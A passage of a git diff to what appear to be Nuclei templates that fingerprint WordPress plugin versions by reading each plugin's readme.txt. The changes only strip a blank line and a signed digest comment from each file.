b/http/technologies/wordpress/plugins/formidable.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/formidable/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220528c93385a6ae0c3617e7ebc7a9dd6eb44b2e8184eec744715557d8b9967736f022100c80081b280dce2abd411d5cf7806938bfa2404be6fcf02d31ed580d0c5929ef1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 0f17abf592..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/forminator/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ef4be47ccb8b8ca448cec70006b456ce32135b1bbc956e12ce6d8de32195467d022100cc569215d713495121d5dc94bf279b4e184867dbb38902a04971c996fd908f84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index a8f3add5e1..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/ga-google-analytics/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d843aa4c0e4da4955c2250d2e59821f68fae752b068f406841e91ef79f1bfd61022074911a03a6b652ab5175a08ffb95d4ce271dd08975a6e95147d24550978b88b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 1b83518d76..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/gdpr-cookie-compliance/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100eb9a2104a3f070db0eda69928a0c07cb56e4001b854c2bd100b4bc5b080c371e0221009c9995a470e7c2c30bf9a52b09ae9095885bd40838b05d022bf4cb32569cec23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 21f2467fe3..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/google-analytics-dashboard-for-wp/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204279ef7ec2d4d60e8f645900f1d366ac99beaf93fefdb91ba639cb0cca242598022100c26f06f193d32034aa7888f6b6dcc49a073f20094808049d0a477fdcccd15ab2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 02a3c1a274..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/google-analytics-for-wordpress/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b423b8ede410897da835f2965976dd42cfd4e782d25aa79c487fd8adcc948f6d02204dda06ae887316afd4876b95d201eba64f4964b031d7d5181c32f955531cb091:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index cbed99e9e9..b7ea2d38d1 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/google-listings-and-ads/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204a1fa74fb28b200ee395d616faba04f944ecd5985b07634124291c81ff43294d022100858b60040c1b985a7f260517e655ba7f259d380f160018ed28e3e7dd73e18a1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index a958fe8603..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/google-site-kit/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e1f28ef91cb547cdc91d1f860b8d6a290ed7fd154b65245a6df83f4f0310792302207eac5196ab5555ab008806dd26cc4353059e1bb8993d3095a33d15aac35e315f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 49ac6698a5..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/google-sitemap-generator/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221009abf2ef18289f19a637c28656319f003e625a0b9b4de78179e76c09fb905ff6a022100b5428c5f7bb7853b3d15494124b9d5cf78938d9f01349a8e8560b62feb9cfa07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index edce061f6f..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/gtranslate/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100acd4eae7e08e0d086ef24c791d42a933e24780e98acdae2500e313b683d5059e022100cdbff1288a06ef48a31d743658e39d4345ccf88bf3c47749b6cd716f4de91308:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 62a3d22acb..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/gutenberg/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202256cf6f782410dc5090c6bea474fd6dadebfe6938888fa2c6e81db135ee395302202ba702c0081a2265032308786010c126687198394b32da02298435dfd6cf363c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index bc5959d77b..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/happy-elementor-addons/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a5fd9c8d4874b276f49a5d4ecc674daca21582bfa2cbd83b99d907100f8903a102202ba5ced28247a0d221f8e81d59a80bf359a0c0eb58f270251630da64f67a753a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index aa1998c856..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/header-footer-code-manager/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204af622448b78b80c45cfd3b99169b528bf5874f0b70b16c5d73845c3b7a784c5022050f995526442731d018c3273720687e74f189220fde461d3643460f529225a84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 9da1fe8705..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/header-footer-elementor/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fa4c6694486da7ba36d9a98f22b824bf449072f228a6bb9ebc171558a3ba7ffb0221009b03e94116b9d8c85a0732eb9cc6165ad7e86a34f664345b1cbb588a32c96a95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 578ceb8b59..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/header-footer/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c1d30cfa831c35d10a7d054cb07f157e8d6a4341c979727c771fff03db90c04b022014a4e495ec0631c2474959293f973178405d784ae69f5cb51b042a475aa91db8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 9d39ad8310..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/health-check/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220290c84b4f94c66bae0faf11badb1608323763ebedbadea52da214976f5573ac8022069025656ffe3f3445bdef6bc2626d4f6eec4892413c6a36e15e097017b33dda6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index b1fdf84722..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/hello-dolly/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a36dc00c3e63c5cf01841a03a1bfc729dc100885ccfac7620e83a75f1d340f2202203db6422932f20abe3a08967aecab00bf2e43a5d75b56ad54f9d9119083bd0c0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 8bb8b22622..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/host-webfonts-local/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ae1b785251de676edb806ba9ebaf03a43de0359ea4bec5800e2fc5cc72cef10a022100cfb876ce09f35961bf77be7574a4673015f7b4d519d0016480ebefdb8e2a2336:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index cd3f80cbe1..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/hostinger/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e18e3ade32c1c9cb2463116a80d01fd5c97d8271af36955dad246d6d48c3206a0221008d104741dba7f1d13c2b2daead6469d18e7287a3479f0bf99b3f8f9eeef36cd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 6fb68580c0..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/image-optimization/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009306b2696b5597db10a083ed5659670cbc199222e7c145783a9d1e8c334b10070220551ec4c5f71b31a95748876576ecf5fa777e25add8c91f08e511f34a78333eb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index e3d5ed32e7..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/imagify/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b0fd6ef06c2720382ede82db58559b8fb4f2a84c506cedad6a586c9ced466c42022100ea40836194a6574b56398679b13d8af5c1c0515c6537e8cac0bde66f90da99e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 574c44f1c7..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/imsanity/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b426bd27e56f26cba6d3d2c32f4364ba39d56f9cb988fee076650a24d497c51b022100812453d4f89abde4640e166f13fddfda6b43366ef6611b80525c77d3b0ee31a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 80907e357b..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/insert-headers-and-footers/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cdfbcd01328bb76484969176b91b835295d56471a231a735cf922707363558bf022100e26cb716f77735c89a01438c5329976d57fe156df9ca4f74a31932e36a81f7e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 63ccf92370..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/instagram-feed/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100deb8e58412536eb0491aa1720df540a710fabaa4b38599036eafa3b3ba6cd0dd02207c8720ede2effeee51b0073cd58810131e41dc14f267af5a0d1cde33fd39dff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 6f98718f0a..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/intuitive-custom-post-order/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022036baa65eda2b326222095336490e037f73d65608570781c9a5a9683d78debf7a0220334ffa0e5bdef7137e5fd9c9dce6e9c8e0e8d687891e6f3f5b573620039687fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 3e460799aa..c1a44066bb 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/iwp-client/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220408e2e4e8f72e94249af32eeda44f9279c53bbacc5940f2d32adb4fdf08ac235022100cc67cca4948a9d656d2fdc1bf1d0ad2f9b31e48f36d449cb017437e4416cb5ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 76e4e4c71e..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/jetpack-boost/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c0b5df059977953eabe1bf848821398fd6535989afa5591859eba3d84af504d702203aa979a0b77e19408b24f2f8895a5f9ae8a54c6d759a7867df159ba4c693f4a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index f2f4df8507..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/jetpack/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a31b74324012e7663994f9c9e485502e3d6ebbd0534d086f760702a28fef42580221009c41f9a051dca9257da06cccbc2a11c973916782c7d85c58a5c857841e1adea0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 4996a78715..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/kadence-blocks/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a082938ceb148b1b6edb7fd1737e2faf9913df557ae3e9006d6301a7dd272ce002203bf94abfe3b4fd07b91c2c6be3deb2662f6938a1ce42c2ff6cffa59778690672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 6395a49dbd..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/kirki/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a490e13a60e41cc4dd35568fbc7233514b94fda479d8d1d6e70c74fd4e0ddf550220649416b8cdb6b82b3ef690754304121ef9ebc6f4626758dae088fdf2172888c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 7036ed3573..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/leadin/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ee609819c3e4510dde8b5409c86d8a02120c1da051e5dca31d7213f4332f776202203b5ed0f143a6e684abb635c1dd4a725a0abce9e11f1621a909244fd23ea5f84e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 6d05262166..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts-reloaded/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100846316266a3e61913ad5a785d86a88b28434c68c0ecb4a31e003988ffd8e754102210092381d5e15999ddb3b6ef0ba4f80738843b3b565a32f5c23cb585717396148a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index d3f07ac9b7..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/limit-login-attempts/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fa5b9dd85ef276134947873898540f67fec69d04915b66eb120fce01f8f2a9da022100d6f6dcec37806c8abf3f2b1f6e86925845b2972273532e9cd10b16dfad4e922c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 79a14921d7..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/litespeed-cache/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022015e10e4b42630ffe1066822cc78ef1b8d9c921a90b2f8daf80f56fd59862250a0220257cd945984ce8b188fb61cab2c190fec2db1b1dbccdc59a5ec24e362f6a0f31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 63f6b0fcf0..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/loco-translate/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d8b2452cd295bd5493055486c29c92457bdd37b1442b03b8a287d0dbc1fb1de5022100f85822504e303f50f6ea5403edc622bdbba0d2f2e4178cdbca67f92ba876664b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index ea8ce219b7..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/loginizer/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206eeee9fef9e42e9efe2d8af2da7f21957af6ae30bd4d5f7ff8c898472db1bb81022100c0b3c7b3c8c2305582228b01f5a8861e0b6c3f26ed577a05ca8dd8fbaeb225c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 240909e631..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/mailchimp-for-woocommerce/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a939c88ba1e9a347e7d8a049834bb356c8f569fe79e94c75279c42ed508f0559022100918ff436fe0d196e4c6f6a3f4e31d9db5553581e53d9d3027fa472de0ea644a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 91e9c9285b..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/mailchimp-for-wp/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220730b1789b8bd16491734aa90960459d30012aee0b9357813affcaafc8f95f3230220444b70a3675d41ce67a4d8a2d9675b370ff4ee91b3eb520452e796b3b91c4d2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index c8ef0a3a34..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/mailpoet/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220160426c2c45ed3dd1f1c93b3f2e3dffdb9b51ad5703d3307606bb796b371b87f022100a20f2f72755f8e798b0c04e917eed35b450c651f4b4eb5f469a4ab77278edcf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 1dfbe22b8e..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -13,7 +13,6 @@ info: http: - method: GET - path: - "{{BaseURL}}/wp-content/plugins/maintenance/readme.txt" @@ -47,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 